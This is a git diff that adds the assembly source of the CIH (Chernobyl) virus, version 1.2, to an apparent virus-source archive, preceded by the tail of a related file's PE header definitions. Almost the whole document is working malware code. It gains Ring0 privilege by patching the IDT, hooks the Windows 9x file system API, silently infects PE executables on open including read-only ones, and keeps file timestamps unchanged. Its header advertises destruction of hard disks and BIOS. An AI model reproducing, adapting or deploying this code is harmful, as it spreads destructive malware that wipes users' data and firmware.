+SymbolsPointer dd ?
+NumberOfSymbols dd ?
+SizeOfOptionalHeader dw ?
+_Characteristics dw ?
+Magic dw ?
+LinkerVersion dw ?
+SizeOfCode dd ?
+SizeOfInitializedData dd ?
+SizeOfUninitializedData dd ?
+AddressOfEntryPoint dd ?
+BaseOfCode dd ?
+BaseOfData dd ?
+ImageBase dd ?
+@9 = $
+SectionAlignment dd ?
+FileAlignment dd ?
+OperatingSystemVersion dd ?
+ImageVersion dd ?
+SubsystemVersion dd ?
+Reserved dd ?
+SizeOfImage dd ?
+SizeOfHeaders dd ?
+SizeOfImageHeaderToRead = $-NumberOfSections
+NewAddressOfEntryPoint = DataBuffer ; DWORD
+SizeOfImageHeaderToWrite= 04h
+StartOfSectionTable = @9
+SectionName = StartOfSectionTable ; QWORD
+VirtualSize = StartOfSectionTable+08h ; DWORD
+VirtualAddress = StartOfSectionTable+0ch ; DWORD
+SizeOfRawData = StartOfSectionTable+10h ; DWORD
+PointerToRawData = StartOfSectionTable+14h ; DWORD
+PointerToRelocations = StartOfSectionTable+18h ; DWORD
+PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
+NumberOfRelocations = StartOfSectionTable+20h ; WORD
+NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
+Characteristics = StartOfSectionTable+24h ; DWORD
+SizeOfScetionTable = Characteristics+04h-SectionName
+
+; *********************************************************
+; * Virus Total Need Memory *
+; *********************************************************
+
+VirusNeedBaseMemory = $
+VirusTotalNeedMemory = @9
+; + NumberOfSections(??)*SizeOfScetionTable(28h)
+; + SizeOfVirusCodeSectionTableEndMark(04h)
+; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
+; + SizeOfTheFirstVirusCodeSectionTable(04h)
+; *********************************************************
+
+VirusGame ENDS
+ END FileHeader
diff --git a/MSDOS/Virus.MSDOS.Unknown.cih_12.asm b/MSDOS/Virus.MSDOS.Unknown.cih_12.asm
new file mode 100644
index 00000000..044ca02d
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cih_12.asm
@@ -0,0 +1,1480 @@
+; ****************************************************************************
+; * The Virus Program Information *
+; ****************************************************************************
+; * *
+; * Designer : CIH Original Place : TTIT of Taiwan *
+; * Create Date : 04/26/1998 Now Version : 1.2 *
+; * Modification Time : 05/21/1998 *
+; * *
+; *==========================================================================*
+; * Modification History *
+; *==========================================================================*
+; * v1.0 1. Create the Virus Program. *
+; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
+; * 04/26/1998 3. Virus Code doesn't Reload into System. *
+; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
+; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
+; * 6. When System Opens Existing PE File, the File will be *
+; * Infected, and the File doesn't be Reinfected. *
+; * 7. It is also Infected, even the File is Read-Only. *
+; * 8. When the File is Infected, the Modification Date and Time *
+; * of the File also don't be Changed. *
+; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
+; * Previous FileSystemApiHook, it will Call the Function *
+; * that the IFS Manager Would Normally Call to Implement *
+; * this Particular I/O Request. *
+; * 10. The Virus Size is only 656 Bytes. *
+; *==========================================================================*
+; * v1.1 1. Especially, the File that be Infected will not Increase *
+; * it's Size... ^__^ *
+; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
+; * When Exception Error Occurs, Our OS System should be in *
+; * Windows NT. So My Cute Virus will not Continue to Run, *
+; * it will Jmup to Original Application to Run. *
+; * 3. Use Better Algorithm, Reduce Virus Code Size. *
+; * 4. The Virus "Basic" Size is only 796 Bytes. *
+; *==========================================================================*
+; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
+; * 2. Modify the Bug of v1.1 *
+; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
+; ****************************************************************************
+
+ .586P
+
+; ****************************************************************************
+; * Original PE Executable File(Don't Modify this Section) *
+; ****************************************************************************
+
+OriginalAppEXE SEGMENT
+
+FileHeader:
+ db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
+ db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
+ db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
+ db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
+ db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
+ db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
+ db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
+ db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
+ db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
+ db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
+ db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
+ db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
+ db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
+ db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
+ db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
+ db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
+ db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
+ db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
+ db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
+ db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ dd 00000000h, VirusSize
+
+OriginalAppEXE ENDS
+
+; ****************************************************************************
+; * My Virus Game *
+; ****************************************************************************
+
+; *********************************************************
+; * Constant Define *
+; *********************************************************
+
+TRUE = 1
+FALSE = 0
+
+DEBUG = TRUE
+
+MajorVirusVersion = 1
+MinorVirusVersion = 2
+
+VirusVersion = MajorVirusVersion*10h+MinorVirusVersion
+
+
+IF DEBUG
+
+ FirstKillHardDiskNumber = 81h
+ HookExceptionNumber = 05h
+
+ELSE
+
+ FirstKillHardDiskNumber = 80h
+ HookExceptionNumber = 03h
+
+ENDIF
+
+
+FileNameBufferSize = 7fh
+
+; *********************************************************
+; *********************************************************
+
+VirusGame SEGMENT
+
+ ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
+ ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
+
+; *********************************************************
+; * Ring3 Virus Game Initial Program *
+; *********************************************************
+
+MyVirusStart:
+ push ebp
+
+; *************************************
+; * Let's Modify Structured Exception *
+; * Handing, Prevent Exception Error *
+; * Occurrence, Especially in NT. *
+; *************************************
+
+ lea eax, [esp-04h*2]
+
+ xor ebx, ebx
+ xchg eax, fs:[ebx]
+
+ call @0
+@0:
+ pop ebx
+
+ lea ecx, StopToRunVirusCode-@0[ebx]
+ push ecx
+
+ push eax
+
+; *************************************
+; * Let's Modify *
+; * IDT(Interrupt Descriptor Table) *
+; * to Get Ring0 Privilege... *
+; *************************************
+
+ push eax ;
+ sidt [esp-02h] ; Get IDT Base Address
+ pop ebx ;
+
+ add ebx, HookExceptionNumber*08h+04h ; ZF = 0
+
+ cli
+
+ mov ebp, [ebx] ; Get Exception Base
+ mov bp, [ebx-04h] ; Entry Point
+
+ lea esi, MyExceptionHook-@1[ecx]
+
+ push esi
+
+ mov [ebx-04h], si ;
+ shr esi, 16 ; Modify Exception
+ mov [ebx+02h], si ; Entry Point Address
+
+ pop esi
+
+; *************************************
+; * Generate Exception to Get Ring0 *
+; *************************************
+
+ int HookExceptionNumber ; GenerateException
+ReturnAddressOfEndException = $
+
+; *************************************
+; * Merge All Virus Code Section *
+; *************************************
+
+ push esi
+ mov esi, eax
+
+LoopOfMergeAllVirusCodeSection:
+
+ mov ecx, [eax-04h]
+
+ rep movsb
+
+ sub eax, 08h
+
+ mov esi, [eax]
+
+ or esi, esi
+ jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
+
+ jmp LoopOfMergeAllVirusCodeSection
+
+QuitLoopOfMergeAllVirusCodeSection:
+
+ pop esi
+
+; *************************************
+; * Generate Exception Again *
+; *************************************
+
+ int HookExceptionNumber ; GenerateException Again
+
+; *************************************
+; * Let's Restore *
+; * Structured Exception Handing *
+; *************************************
+
+ReadyRestoreSE:
+ sti
+
+ xor ebx, ebx
+
+ jmp RestoreSE
+
+; *************************************
+; * When Exception Error Occurs, *
+; * Our OS System should be in NT. *
+; * So My Cute Virus will not *
+; * Continue to Run, it Jmups to *
+; * Original Application to Run. *
+; *************************************
+
+StopToRunVirusCode:
+@1 = StopToRunVirusCode
+
+ xor ebx, ebx
+ mov eax, fs:[ebx]
+ mov esp, [eax]
+
+RestoreSE:
+ pop dword ptr fs:[ebx]
+ pop eax
+
+; *************************************
+; * Return Original App to Execute *
+; *************************************
+
+ pop ebp
+
+ push 00401000h ; Push Original
+OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
+
+ ret ; Return to Original App Entry Point
+
+; *********************************************************
+; * Ring0 Virus Game Initial Program *
+; *********************************************************
+
+MyExceptionHook:
+@2 = MyExceptionHook
+
+ jz InstallMyFileSystemApiHook
+
+; *************************************
+; * Do My Virus Exist in System !? *
+; *************************************
+
+ mov ecx, dr0
+ jecxz AllocateSystemMemoryPage
+
+ add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
+
+; *************************************
+; * Return to Ring3 Initial Program *
+; *************************************
+
+ExitRing0Init:
+ mov [ebx-04h], bp ;
+ shr ebp, 16 ; Restore Exception
+ mov [ebx+02h], bp ;
+
+ iretd
+
+; *************************************
+; * Allocate SystemMemory Page to Use *
+; *************************************
+
+AllocateSystemMemoryPage:
+
+ mov dr0, ebx ; Set the Mark of My Virus Exist in System
+
+ push 00000000fh ;
+ push ecx ;
+ push 0ffffffffh ;
+ push ecx ;
+ push ecx ;
+ push ecx ;
+ push 000000001h ;
+ push 000000002h ;
+ int 20h ; VMMCALL _PageAllocate
+_PageAllocate = $ ;
+ dd 00010053h ; Use EAX, ECX, EDX, and flags
+ add esp, 08h*04h
+
+ xchg edi, eax ; EDI = SystemMemory Start Address
+
+ lea eax, MyVirusStart-@2[esi]
+
+ iretd ; Return to Ring3 Initial Program
+
+; *************************************
+; * Install My File System Api Hook *
+; *************************************
+
+InstallMyFileSystemApiHook:
+
+ lea eax, FileSystemApiHook-@6[edi]
+
+ push eax ;
+ int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
+IFSMgr_InstallFileSystemApiHook = $ ;
+ dd 00400067h ; Use EAX, ECX, EDX, and flags
+
+ mov dr0, eax ; Save OldFileSystemApiHook Address
+
+ pop eax ; EAX = FileSystemApiHook Address
+
+ ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
+ mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
+ mov edx, [ecx]
+ mov OldInstallFileSystemApiHook-@3[eax], edx
+
+ ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
+ lea eax, InstallFileSystemApiHook-@3[eax]
+ mov [ecx], eax
+
+ cli
+
+ jmp ExitRing0Init
+
+; *********************************************************
+; * Code Size of Merge Virus Code Section *
+; *********************************************************
+
+CodeSizeOfMergeVirusCodeSection = offset $
+
+; *********************************************************
+; * IFSMgr_InstallFileSystemApiHook *
+; *********************************************************
+
+InstallFileSystemApiHook:
+ push ebx
+
+ call @4 ;
+@4: ;
+ pop ebx ; mov ebx, offset FileSystemApiHook
+ add ebx, FileSystemApiHook-@4 ;
+
+ push ebx
+ int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
+IFSMgr_RemoveFileSystemApiHook = $
+ dd 00400068h ; Use EAX, ECX, EDX, and flags
+ pop eax
+
+ ; Call Original IFSMgr_InstallFileSystemApiHook
+ ; to Link Client FileSystemApiHook
+ push dword ptr [esp+8]
+ call OldInstallFileSystemApiHook-@3[ebx]
+ pop ecx
+
+ push eax
+
+ ; Call Original IFSMgr_InstallFileSystemApiHook
+ ; to Link My FileSystemApiHook
+ push ebx
+ call OldInstallFileSystemApiHook-@3[ebx]
+ pop ecx
+
+ mov dr0, eax ; Adjust OldFileSystemApiHook Address
+
+ pop eax
+
+ pop ebx
+
+ ret
+
+; *********************************************************
+; * Static Data *
+; *********************************************************
+
+OldInstallFileSystemApiHook dd ?
+
+; *********************************************************
+; * IFSMgr_FileSystemHook *
+; *********************************************************
+
+; *************************************
+; * IFSMgr_FileSystemHook Entry Point *
+; *************************************
+
+FileSystemApiHook:
+@3 = FileSystemApiHook
+
+ pushad
+
+ call @5 ;
+@5: ;
+ pop esi ; mov esi, offset VirusGameDataStartAddress
+ add esi, VirusGameDataStartAddress-@5
+
+; *************************************
+; * Is OnBusy !? *
+; *************************************
+
+ test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
+ jnz pIFSFunc ; goto pIFSFunc
+
+; *************************************
+; * Is OpenFile !? *
+; *************************************
+
+ ; if ( NotOpenFile )
+ ; goto prevhook
+ lea ebx, [esp+20h+04h+04h]
+ cmp dword ptr [ebx], 00000024h
+ jne prevhook
+
+; *************************************
+; * Enable OnBusy *
+; *************************************
+
+ inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
+
+; *************************************
+; * Get FilePath's DriveNumber, *
+; * then Set the DriveName to *
+; * FileNameBuffer. *
+; *************************************
+; * Ex. If DriveNumber is 03h, *
+; * DriveName is 'C:'. *
+; *************************************
+
+ ; mov esi, offset FileNameBuffer
+ add esi, FileNameBuffer-@6
+
+ push esi
+
+ mov al, [ebx+04h]
+ cmp al, 0ffh
+ je CallUniToBCSPath
+
+ add al, 40h
+ mov ah, ':'
+
+ mov [esi], eax
+
+ inc esi
+ inc esi
+
+; *************************************
+; * UniToBCSPath *
+; *************************************
+; * This Service Converts *
+; * a Canonicalized Unicode Pathname *
+; * to a Normal Pathname in the *
+; * Specified BCS Character Set. *
+; *************************************
+
+CallUniToBCSPath:
+ push 00000000h
+ push FileNameBufferSize
+ mov ebx, [ebx+10h]
+ mov eax, [ebx+0ch]
+ add eax, 04h
+ push eax
+ push esi
+ int 20h ; VXDCall UniToBCSPath
+UniToBCSPath = $
+ dd 00400041h
+ add esp, 04h*04h
+
+; *************************************
+; * Is FileName '.EXE' !? *
+; *************************************
+
+ ; cmp [esi+eax-04h], '.EXE'
+ cmp [esi+eax-04h], 'EXE.'
+ pop esi
+ jne DisableOnBusy
+
+IF DEBUG
+
+; *************************************
+; * Only for Debug *
+; *************************************
+
+ ; cmp [esi+eax-06h], 'FUCK'
+ cmp [esi+eax-06h], 'KCUF'
+ jne DisableOnBusy
+
+ENDIF
+
+; *************************************
+; * Is Open Existing File !? *
+; *************************************
+
+ ; if ( NotOpenExistingFile )
+ ; goto DisableOnBusy
+ cmp word ptr [ebx+18h], 01h
+ jne DisableOnBusy
+
+; *************************************
+; * Get Attributes of the File *
+; *************************************
+
+ mov ax, 4300h
+ int 20h ; VXDCall IFSMgr_Ring0_FileIO
+IFSMgr_Ring0_FileIO = $
+ dd 00400032h
+
+ jc DisableOnBusy
+
+ push ecx
+
+; *************************************
+; * Get IFSMgr_Ring0_FileIO Address *
+; *************************************
+
+ mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
+ mov edi, [edi]
+
+; *************************************
+; * Is Read-Only File !? *
+; *************************************
+
+ test cl, 01h
+ jz OpenFile
+
+; *************************************
+; * Modify Read-Only File to Write *
+; *************************************
+
+ mov ax, 4301h
+ xor ecx, ecx
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; *************************************
+; * Open File *
+; *************************************
+
+OpenFile:
+ xor eax, eax
+ mov ah, 0d5h
+ xor ecx, ecx
+ xor edx, edx
+ inc edx
+ mov ebx, edx
+ inc ebx
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+ xchg ebx, eax ; mov ebx, FileHandle
+
+; *************************************
+; * Need to Restore *
+; * Attributes of the File !? *
+; *************************************
+
+ pop ecx
+
+ pushf
+
+ test cl, 01h
+ jz IsOpenFileOK
+
+; *************************************
+; * Restore Attributes of the File *
+; *************************************
+
+ mov ax, 4301h
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; *************************************
+; * Is Open File OK !? *
+; *************************************
+
+IsOpenFileOK:
+ popf
+
+ jc DisableOnBusy
+
+; *************************************
+; * Open File Already Succeed. ^__^ *
+; *************************************
+
+ push esi ; Push FileNameBuffer Address to Stack
+
+ pushf ; Now CF = 0, Push Flag to Stack
+
+ add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
+
+; ***************************
+; * Get OffsetToNewHeader *
+; ***************************
+
+ xor eax, eax
+ mov ah, 0d6h
+
+ ; For Doing Minimal VirusCode's Length,
+ ; I Save EAX to EBP.
+ mov ebp, eax
+
+ xor ecx, ecx
+ mov cl, 04h
+ xor edx, edx
+ mov dl, 3ch
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+ mov edx, [esi]
+
+; ***************************
+; * Get 'PE\0' Signature *
+; * of ImageFileHeader, and *
+; * Infected Mark. *
+; ***************************
+
+ dec edx
+
+ mov eax, ebp
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; ***************************
+; * Is PE !? *
+; ***************************
+; * Is the File *
+; * Already Infected !? *
+; ***************************
+
+ ; cmp [esi], '\0PE\0'
+ cmp dword ptr [esi], 00455000h
+ jne CloseFile
+
+; *************************************
+; * The File is ^o^ *
+; * PE(Portable Executable) indeed. *
+; *************************************
+; * The File isn't also Infected. *
+; *************************************
+
+; *************************************
+; * Start to Infect the File *
+; *************************************
+; * Registers Use Status Now : *
+; * *
+; * EAX = 04h *
+; * EBX = File Handle *
+; * ECX = 04h *
+; * EDX = 'PE\0\0' Signature of *
+; * ImageFileHeader Pointer's *
+; * Former Byte. *
+; * ESI = DataBuffer Address ==> @8 *
+; * EDI = IFSMgr_Ring0_FileIO Address *
+; * EBP = D600h ==> Read Data in File *
+; *************************************
+; * Stack Dump : *
+; * *
+; * ESP => ------------------------- *
+; * | EFLAG(CF=0) | *
+; * ------------------------- *
+; * | FileNameBufferPointer | *
+; * ------------------------- *
+; * | EDI | *
+; * ------------------------- *
+; * | ESI | *
+; * ------------------------- *
+; * | EBP | *
+; * ------------------------- *
+; * | ESP | *
+; * ------------------------- *
+; * | EBX | *
+; * ------------------------- *
+; * | EDX | *
+; * ------------------------- *
+; * | ECX | *
+; * ------------------------- *
+; * | EAX | *
+; * ------------------------- *
+; * | Return Address | *
+; * ------------------------- *
+; *************************************
+
+ push ebx ; Save File Handle
+
+ push 00h ; Set VirusCodeSectionTableEndMark
+
+; ***************************
+; * Let's Set the *
+; * Virus' Infected Mark *
+; ***************************
+
+ push 01h ; Size
+ push edx ; Pointer of File
+ push edi ; Address of Buffer
+
+; ***************************
+; * Save ESP Register *
+; ***************************
+
+ mov dr1, esp
+
+; ***************************
+; * Let's Set the *
+; * NewAddressOfEntryPoint *
+; * ( Only First Set Size ) *
+; ***************************
+
+ push eax ; Size
+
+; ***************************
+; * Let's Read *
+; * Image Header in File *
+; ***************************
+
+ mov eax, ebp
+ mov cl, SizeOfImageHeaderToRead
+ add edx, 07h ; Move EDX to NumberOfSections
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; ***************************
+; * Let's Set the *
+; * NewAddressOfEntryPoint *
+; * ( Set Pointer of File, *
+; * Address of Buffer ) *
+; ***************************
+
+ lea eax, (AddressOfEntryPoint-@8)[edx]
+ push eax ; Pointer of File
+
+ lea eax, (NewAddressOfEntryPoint-@8)[esi]
+ push eax ; Address of Buffer
+
+; ***************************
+; * Move EDX to the Start *
+; * of SectionTable in File *
+; ***************************
+
+ movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
+ lea edx, [eax+edx+12h]
+
+; ***************************
+; * Let's Get *
+; * Total Size of Sections *
+; ***************************
+
+ mov al, SizeOfScetionTable
+
+ ; I Assume NumberOfSections <= 0ffh
+ mov cl, (NumberOfSections-@8)[esi]
+
+ mul cl
+
+; ***************************
+; * Let's Set Section Table *
+; ***************************
+
+ ; Move ESI to the Start of SectionTable
+ lea esi, (StartOfSectionTable-@8)[esi]
+
+ push eax ; Size
+ push edx ; Pointer of File
+ push esi ; Address of Buffer
+
+; ***************************
+; * The Code Size of Merge *
+; * Virus Code Section and *
+; * Total Size of Virus *
+; * Code Section Table Must *
+; * be Small or Equal the *
+; * Unused Space Size of *
+; * Following Section Table *
+; ***************************
+
+ inc ecx
+ push ecx ; Save NumberOfSections+1
+
+ shl ecx, 03h
+ push ecx ; Save TotalSizeOfVirusCodeSectionTable
+
+ add ecx, eax
+ add ecx, edx
+
+ sub ecx, (SizeOfHeaders-@9)[esi]
+ jnc short OnlySetInfectedMark
+
+ not ecx
+ inc ecx
+
+ cmp cx, small CodeSizeOfMergeVirusCodeSection
+ jb OnlySetInfectedMark
+
+; ***************************
+; * Save Original *
+; * Address of Entry Point *
+; ***************************
+
+ ; Save My Virus First Section Code
+ ; Size of Following Section Table...
+ ; ( Not Include the Size of Virus Code Section Table )
+ push ecx
+
+ xchg ecx, eax ; ECX = Size of Section Table
+
+ mov eax, (AddressOfEntryPoint-@9)[esi]
+ add eax, (ImageBase-@9)[esi]
+ mov (OriginalAddressOfEntryPoint-@9)[esi], eax
+
+; ***************************
+; * Read All Section Tables *
+; ***************************
+
+ mov eax, ebp
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; ***************************
+; * Let's Set Total Virus *
+; * Code Section Table *
+; ***************************
+
+ ; EBX = My Virus First Section Code
+ ; Size of Following Section Table
+ pop ebx
+ pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
+ pop ecx ; ECX = NumberOfSections+1
+
+ push edi ; Size
+
+ add edx, eax
+ push edx ; Pointer of File
+
+ add eax, esi
+ push eax ; Address of Buffer
+
+; ***************************
+; * Set the First Virus *
+; * Code Section Size in *
+; * VirusCodeSectionTable *
+; ***************************
+
+ lea eax, [eax+edi-04h]
+ mov [eax], ebx
+
+; ***************************
+; * Let's Set My Virus *
+; * First Section Code *
+; ***************************
+
+ push ebx ; Size
+
+ add edx, edi
+ push edx ; Pointer of File
+
+ lea edi, (MyVirusStart-@9)[esi]
+ push edi ; Address of Buffer
+
+; ***************************
+; * Let's Modify the *
+; * AddressOfEntryPoint to *
+; * My Virus Entry Point *
+; ***************************
+
+ mov (NewAddressOfEntryPoint-@9)[esi], edx
+
+; ***************************
+; * Setup Initial Data *
+; ***************************
+
+ lea edx, [esi-SizeOfScetionTable]
+ mov ebp, offset VirusSize
+
+ jmp StartToWriteCodeToSections
+
+; ***************************
+; * Write Code to Sections *
+; ***************************
+
+LoopOfWriteCodeToSections:
+
+ add edx, SizeOfScetionTable
+
+ mov ebx, (SizeOfRawData-@9)[edx]
+ sub ebx, (VirtualSize-@9)[edx]
+ jbe EndOfWriteCodeToSections
+
+ push ebx ; Size
+
+ sub eax, 08h
+ mov [eax], ebx
+
+ mov ebx, (PointerToRawData-@9)[edx]
+ add ebx, (VirtualSize-@9)[edx]
+ push ebx ; Pointer of File
+
+ push edi ; Address of Buffer
+
+ mov ebx, (VirtualSize-@9)[edx]
+ add ebx, (VirtualAddress-@9)[edx]
+ add ebx, (ImageBase-@9)[esi]
+ mov [eax+4], ebx
+
+ mov ebx, [eax]
+ add (VirtualSize-@9)[edx], ebx
+
+ ; Section contains initialized data ==> 00000040h
+ ; Section can be Read. ==> 40000000h
+ or (Characteristics-@9)[edx], 40000040h
+
+StartToWriteCodeToSections:
+
+ sub ebp, ebx
+ jbe SetVirusCodeSectionTableEndMark
+
+ add edi, ebx ; Move Address of Buffer
+
+EndOfWriteCodeToSections:
+
+ loop LoopOfWriteCodeToSections
+
+; ***************************
+; * Only Set Infected Mark *
+; ***************************
+
+OnlySetInfectedMark:
+ mov esp, dr1
+
+ jmp WriteVirusCodeToFile
+
+; ***************************
+; * Set Virus Code *
+; * Section Table End Mark *
+; ***************************
+
+SetVirusCodeSectionTableEndMark:
+
+ ; Adjust Size of Virus Section Code to Correct Value
+ add [eax], ebp
+ add [esp+08h], ebp
+
+ ; Set End Mark
+ xor ebx, ebx
+ mov [eax-04h], ebx
+
+; ***************************
+; * When VirusGame Calls *
+; * VxDCall, VMM Modifies *
+; * the 'int 20h' and the *
+; * 'Service Identifier' *
+; * to 'Call [XXXXXXXX]'. *
+; ***************************
+; * Before Writing My Virus *
+; * to File, I Must Restore *
+; * them First. ^__^ *
+; ***************************
+
+ lea eax, (LastVxDCallAddress-2-@9)[esi]
+
+ mov cl, VxDCallTableSize
+
+LoopOfRestoreVxDCallID:
+ mov word ptr [eax], 20cdh
+
+ mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
+ mov [eax+2], edx
+
+ movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
+ sub eax, edx
+
+ loop LoopOfRestoreVxDCallID
+
+; ***************************
+; * Let's Write *
+; * Virus Code to the File *
+; ***************************
+
+WriteVirusCodeToFile:
+ mov eax, dr1
+ mov ebx, [eax+10h]
+ mov edi, [eax]
+
+LoopOfWriteVirusCodeToFile:
+
+ pop ecx
+ jecxz SetFileModificationMark
+
+ mov esi, ecx
+ mov eax, 0d601h
+ pop edx
+ pop ecx
+
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+ jmp LoopOfWriteVirusCodeToFile
+
+; ***************************
+; * Let's Set CF = 1 ==> *
+; * Need to Restore File *
+; * Modification Time *
+; ***************************
+
+SetFileModificationMark:
+ pop ebx
+ pop eax
+
+ stc ; Enable CF(Carry Flag)
+ pushf
+
+; *************************************
+; * Close File *
+; *************************************
+
+CloseFile:
+ xor eax, eax
+ mov ah, 0d7h
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; *************************************
+; * Need to Restore File Modification *
+; * Time !? 
* +; ************************************* + + popf + pop esi + jnc IsKillComputer + +; ************************************* +; * Restore File Modification Time * +; ************************************* + + mov ebx, edi + + mov ax, 4303h + mov ecx, (FileModificationTime-@7)[esi] + mov edi, (FileModificationTime+2-@7)[esi] + call ebx ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Disable OnBusy * +; ************************************* + +DisableOnBusy: + dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy + +; ************************************* +; * Call Previous FileSystemApiHook * +; ************************************* + +prevhook: + popad + + mov eax, dr0 ; + jmp [eax] ; Jump to prevhook + +; ************************************* +; * Call the Function that the IFS * +; * Manager Would Normally Call to * +; * Implement this Particular I/O * +; * Request. * +; ************************************* + +pIFSFunc: + mov ebx, esp + push dword ptr [ebx+20h+04h+14h] ; Push pioreq + call [ebx+20h+04h] ; Call pIFSFunc + pop ecx ; + + 